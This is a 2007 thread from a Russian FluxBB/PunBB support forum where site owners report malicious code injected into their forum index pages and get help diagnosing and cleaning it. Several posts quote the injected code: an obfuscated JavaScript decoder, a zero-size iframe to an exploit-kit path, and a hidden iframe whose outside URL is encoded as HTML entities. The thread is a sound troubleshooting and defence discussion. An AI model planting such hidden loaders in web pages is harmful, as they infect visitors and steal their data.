Русское сообщество fluxbb

Быстрый лёгкий надёжный форумный движок

Вы не вошли.

Объявление

Вы можете внести свой вклад в содержание сайта. Жертвователи попадут в почетную группу "Спонсоры". Поддержать сайт.

Страницы 1

Тема закрыта

#1 2007-05-23 10:42:36

merida
Гость

Что с форумом?

Проблема: в коде страниц форума постоянно появляется следующее:

<!-- o65 --><script language='JavaScript'><!--
function nbsp() {var t,o,l,i,j;var s='';s+=[censored];
s+=[censored];
s=s+[censored];
s=s+[censored];
t='';l=s.length;i=0; while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();
//--></script><!-- c65 -->

форум не работает...

при удалении этого кода все нормально... Что делать?

#2 2007-05-23 12:17:27

hcs
Гость

Re: Что с форумом?

1. не вставлять этот код в форум.
2. обратится с этим к разработчикам вставляемого кода
3. попробовать вставить так чтобы это не появлялось

#3 2007-05-23 14:08:53

Warm
Гость

Re: Что с форумом?

merida
*.h1*.ru ? хостинг?

#4 2007-05-23 14:35:22

artoodetoo
Гость

Re: Что с форумом?

merida, вы неправильно выбрали раздел форума. эта тема относится к БЕСПЛАТНОМУ ХОСТИНГУ, о чем надо было сразу честно написать!
ей место в "Свободной теме". а еще лучше - на форуме хостера. наверняка они знают решение.
кусать руку дающего дело неблагодарное. заблокируют ваш сайт и все закончится

#5 2007-05-23 17:19:32

merida
Гость

Re: Что с форумом?

artoodetoo пишет:

merida, вы неправильно выбрали раздел форума. эта тема относится к БЕСПЛАТНОМУ ХОСТИНГУ, о чем надо было сразу честно написать!
ей место в "Свободной теме". а еще лучше - на форуме хостера. наверняка они знают решение.
кусать руку дающего дело неблагодарное. заблокируют ваш сайт и все закончится

Хостинг платный вот в чем дело! А код появляется сам и неизвестно откуда...

#6 2007-05-23 17:56:31

artoodetoo
Гость

Re: Что с форумом?

одно из двух: либо этот несчастный подвергся XSS атаке, либо merida сам злобный кулхацкер. устроил тут провокацию. на всякий случай я забаню мериду!

а вот секретный код, который пытливый участник нашего форума потенциально мог выполнить в своем браузере:

<iframe src='http://[censored]/mpack/index.php' width=0 height=0 frameborder='0'></iframe>

понятно, что какой-то недружелюбный контент должен открыться у вас. например куки ваши кто-то почитает

Добавлено спустя     23 минуты   35 секунд:
был когда-то прикол на линуксовых форумах. какой-то шутник предлагал расшифровать сложное регулярное выражение на perl. приводилась строка. в итоге если код запускал админ с правами рута, сносились все директории начиная с корня smile очень смешная шутка. так и здесь - мы не знаем с чем имеем дело, возможно лучше этого не знать.

если merida пострадалец - найдет способ списаться с нами лично. форум не надо загаживать!

#7 2007-05-23 19:17:48

hcs
Гость

Re: Что с форумом?

Хм. Под видом wmv подсовывется что-то непонятное. В ие пытается загрузиться компонент, после повторной загрузки страницы выдается :[
Я думаю адрес автора следует передать в управление Р, пусть там разбираются кто и зачем загружает код на удаленный компьютер. Это уже состав для статьи.

#8 2007-05-29 22:25:04

jyrkie
Гость

Re: Что с форумом?

Я не буду приводить код, чтобы меня ненароком не забанили, но у меня целый день такая же проблема, как у merida.
На каждой странице с именем index в конце появляется код iframe, разумеется, форум после этого не грузится. Я 1. не вставляю сама этот код в форум, мне надо, чтобы форум работал, а не валялся; 2. не могу обратиться с вопросом к разработчикам кода, потому что я не знаю, что это за тля поганит мой форум, а если бы я ее нашла... 3. не могу попробовать вставить так, чтобы это не появлялось, потому что как раз я ничего не вставляю. Я убираю эту гадость, тогда все начинает работать. До следующего захода этого нехорошего человека.
Я так понимаю, что в коде форума какая-то дыыырочка. Потому как админский пароль сгенерированый, пару раз уже поменяный, в куках несохраняемый, значит заходят не через него. Хост платный. Хостер, соответственно, не несет никакой ответственности за повешенные скрипты. Пожалуйста, не подскажете, как справиться с этой напастью?

#9 2007-05-29 22:52:10

FedKoFF
Гость

Re: Что с форумом?

Встречался с такой проблемой, когда был взломан хостер, на всех сайт которые у него хостились появлялся подобный код, попробуйте удалить его и выставить права для файлов 444
И обратится конечно же к хостеру.

Редактировался FedKoFF (2007-05-29 22:52:58)

#10 2007-05-29 23:10:28

artoodetoo
Гость

Re: Что с форумом?

хостера надо поставить в известность обязательно! грамотный суппорт вычислит кто и когда изменил файл. по-крайней мере сузят круг для поиска.
покачто нет оснований думать, что дыра в самом punbb. на всякий случай скажите какие у вас моды установлены.

#11 2007-05-29 23:19:09

jyrkie
Гость

Re: Что с форумом?

Большое спасибо!
Все сделала, посмотрим, что будет завтра и чем поможет мне хостер.

Добавлено спустя     21 минуту   39 секунд:

artoodetoo пишет:

покачто нет оснований думать, что дыра в самом punbb

Я только обеими руками за, чтобы кто-то молодой и ретивый не нашел лазейку в движке smile

Я понимаю, что это звучит идиотически, но я, к сожалению, все еще очень плохо разбираюсь в php. Я не рискнула поставить сборку - Сборка нашего форума - доводить до ума - не с моим уровнем подготовки и сейчас, а уж что говорить о том времени, когда я только ставила этот движок. Я скачала официальную версию PunBB 1.2.12 + русский язык.
Спасибо Вам за пинок! Пошла качать последнюю версию и обновляться.

#12 2007-05-30 00:10:38

Slavik
Гость

Re: Что с форумом?

Сборка этого форума как раз и предназначена для людей "плохо разбирающихся в php", самые нужные моды там уже поставлены и не надо ковыряться в коде для их установки.

#13 2007-05-30 11:11:47

jyrkie
Гость

Re: Что с форумом?

Я попробую проапдейтить форум. Если что не будет получаться - попрошу помощи в соответствующем разделе этого форума. Всем большое спасибо за быстрое реагирование и советы!

P.S. Обожаю техподдержку хостеров. "В первую очередь неоходимо проверить все содержимое сайта и удалить
вирусы. Далее обновить версию форума и изменить пароль через панель управления. Желательно включить "Управление необработанными логами" в панели управления, для выявления причины взлома, если он повториться в будущем. А так же проверить свой личный компьютер на наличие вирусов."
Я, конечно, не гений, но письма пишу вроде бы по-русски и вирусов на личном компе не держу. А если они на том, что лежит в сети, разве это не проблема хостера?
Простите, если это не по теме. Больше флудить не буду.

#14 2007-05-30 11:21:11

hcs
Гость

Re: Что с форумом?

Проблема хостера тогда, когда злоумышленники получают доступ к ресурсам по их вине, например они неправильно настроили безопасность. В противном случае это не их проблема.  Интересно посмотреть на твой форум. Ссылку нельзя дать?

#15 2007-06-09 06:28:38

arta999
Гость

Re: Что с форумом?

люди хелп... у меня стоит мкпортал в корневой, и этот форум в папке forum1 вчера снесли в корневой индекс пхп напроч, зашла утром ничего не грузится лезу по фтп страница индекс пхп 0 байт... залилу по-новой, сегодня утром зашла у меня форум не грузится, достала индекс пхп сравнила с индекс пхп из дистрибутива там в самом конце строка добавлена 

<iframe 
src="&#104&#116&#116&#112&#58&#47&#47&#109&#105&#108&#108&#97&#45&#109&#111&#100&#101&#108&#46&#104&#117&#116&#50&#46&#114&#117&#47&#105&#110&#100&#101&#120&#46&#104&#116&#109&#108" width="0" height="0" style="display:none"></iframe>

удалила ее все загрузилось

но что это так и будет продолжаться? sad((

#16 2007-06-09 16:23:15

niikto
Гость

Re: Что с форумом?

вот же уроды какие sad

кстате читат лул интересную тему - анти ддос: http://forum.omsk.com/viewtopic.php?t=47114

насколько это правильно/трудоёмко/актуально?

#17 2007-06-09 16:46:57

hcs
Гость

Re: Что с форумом?

непонимаю смысла этой защиты. они борются со следствием,а при досе это бесполезно и бесмыслено.

#18 2007-06-09 22:17:09

niikto
Гость

Re: Что с форумом?

как же спастить от ддос?
только пережидать?

#19 2007-06-21 07:16:01

artoodetoo
Гость

Re: Что с форумом?

похоже очень многие подвергаются подобной атаке. судя по обсуждению на форумах это не изъян конкретного скрипта или хостинга, а кража пароля трояном. вот одно из сообщений: http://peterhost.ru/forum/viewtopic.php?t=5727
троян приползает через этот самый "левый" iframe к посетителям сломанного сайта.
есть подозрения, что пароли крадутся из сохраненных в Total Commander.

решение - меняйте пароли, не сохраняйте их в настройках ftp-клиентов, а держите на бумаге или в картинках в надежном месте, ставьте антивирусники и файрволы!

я снял бан с merida, всех пользователей предупреждаю - не цитируйте целиком хакерский код. не надо помогать хакерам распостранять гадость! достаточно небольшого фрагмента и описания проблемы.

#20 2007-06-21 07:18:45

hcs
Гость

Re: Что с форумом?

дополнение к вышесказанному: переходите на линуксы smile

#21 2007-06-21 13:21:48

CR
Гость

Re: Что с форумом?

кстате у меня тоже было нечто подобное, месяца два назад
в индекс.пхп вконец тоже ставился фрейм чёта там грузилось с него, но всё работало
всё исчезло как поменял пароли : ))
хоть и не юзаю TC =\

#22 2007-06-21 15:37:24

niikto
Гость

Re: Что с форумом?

жду ibm t41 - на него поставлю дибо дебиан 4, либо генту...
виндовс - гудбай.

тока не понял прчем тут фтп?

ддос это када твой сайт хостер отрубает, оптом атака кончается, и он включает... - покраней мере со стороны юзера - так.


а всё понял - тема то не про ддос....

Редактировался niikto (2007-06-21 15:40:08)

#23 2007-06-21 16:25:49

artoodetoo
Гость

Re: Что с форумом?

niiko, а причем тут дос? топик про внедрение чужого кода в index

#24 2007-06-22 13:52:37

niikto
Гость

Re: Что с форумом?

ага, я уже выше написал smile

Страницы 1

Тема закрыта

Подвал доски

Под управлением FluxBB. Хостинг Hostens